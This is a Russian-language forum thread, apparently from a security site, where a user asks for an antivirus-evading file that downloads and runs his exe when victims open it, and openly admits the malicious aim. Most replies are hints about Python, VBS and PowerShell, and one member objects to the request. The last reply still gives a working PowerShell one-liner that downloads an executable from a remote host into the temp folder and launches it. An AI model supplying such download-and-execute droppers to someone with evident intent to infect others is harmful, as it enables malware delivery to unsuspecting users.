• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Вопрос по подгрузу ехе

  • Автор темы GroveStreet
  • Дата начала
  • Теги
    vba
G

GroveStreet

Нужно сделать файл, который подгрузит мой ехе, файл будет скачиваться через хром (нужно что бы не палился), раньше работали js вроде бы, где бы найти того кто сделает?
 
Последнее редактирование:
G

GroveStreet

Или может есть другие варианты? Нужно что бы скачивался какой нибудь левый файл, который юзер потом запустит, главное не ехе.
 

Kotik_Begimotik

Green Team
29.12.2018
36
6
BIT
0
Если правильно понял, то так.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe' 
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/cat.jpg')
 

Kotik_Begimotik

Green Team
29.12.2018
36
6
BIT
0
Чуть выше ошибся, пока переписывал.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe'
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/file.exe')
 
G

GroveStreet

как вариант - сделай самораспаковывающийся архив RAR.
если юзер и вправду юзер, то можно батник или заставку SCR
Спасибо за ответ.
Архив к сожалению не подойдёт тоже, а как сделать что бы батник скачивал и запускал файл с интернета? Я находил что то похожее, но там костыли какие то получались, наполовину ходячие)
 

Marylin

Mod.Assembler
Red Team
05.06.2019
295
1 310
BIT
89
а как сделать что бы батник скачивал и запускал файл с интернета?
системная ком-строка не может такого,
нужно скачать и её потом вызывать батником.
примеры оформления есть по ссылке.
 
G

GroveStreet

Чуть выше ошибся, пока переписывал.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe'
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/file.exe')
О, только заметил. Проверю на компе завтра, спасибо. А это точно всё? Я видел примеры, там обычно побольше код.
 
Последнее редактирование:

centr

Green Team
31.01.2017
408
475
BIT
0
Испольйте vbs скрипт если вам не важно сокрытие исходного кода, средствами vbs скачать файл из интернета вполне возможно.

Вариант с python не то что вам нужно, если конечно вы не уверены что на целевой хосте предустановлен интреперато python.

Так же как вариант можно использовать powershell, но более универсальным будет вариант с vbs.
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Ухахах, ну да конечно, ехе файл юзер не запустит, а вот .ру и .bat запустит 😂😂😂 успехов)))
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Чуть выше ошибся, пока переписывал.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe'
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/file.exe')
Ну и конечно если надо просто скачать файл - это правильно. Но вот в 99% этот файл надо ещё запустить
 
G

GroveStreet

Конечно, файл надо ещё и запустить.
Попробую разобраться с vbs, потрясу гугл на наличие готовых решений.
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Автор не майся херью, всем очевидно, что ты не в образовательных целях спрашиваешь.
 
G

GroveStreet

А разве это не хацкерский форум? Я сразу в первом посте сказал что бы файл не палился, по-моему это было сразу очевидно.
По теме - все паблик решения палятся всем чем можно, может нужно делать какую то обфускацию, я не знаю и я не спец. Я знаю что были сервисы на экспе которые делали js файлы для спама, к сожалению доступ на форум утратил. Но уверен что такие умельцы ещё есть.
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
А разве это не хацкерский форум?
Это форум специалистов по информационной безопасности. Надеюсь ты уловил разницу. Тут существуют люди работающие в однобуквенных, трехбуквенных и пятибуквенных учреждений РФ
 
G

GroveStreet

Такие люди на каждом хак форуме есть. И не только хак.
Ну ок, значит тут мне не помогут провести аудит моих работников в компании, а жаль :( Поищу в другом месте.
 

gushmazuko

Red Team
24.03.2017
173
451
BIT
0
Можно использовать PowerShell:
Код:
powershell (New-Object System.Net.WebClient).DownloadFile("http://192.168.0.1/file.exe","$env:temp\file.exe");[System.Diagnostics.Process]::Start("$env:temp\file.exe")

Скачивает и запускает.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!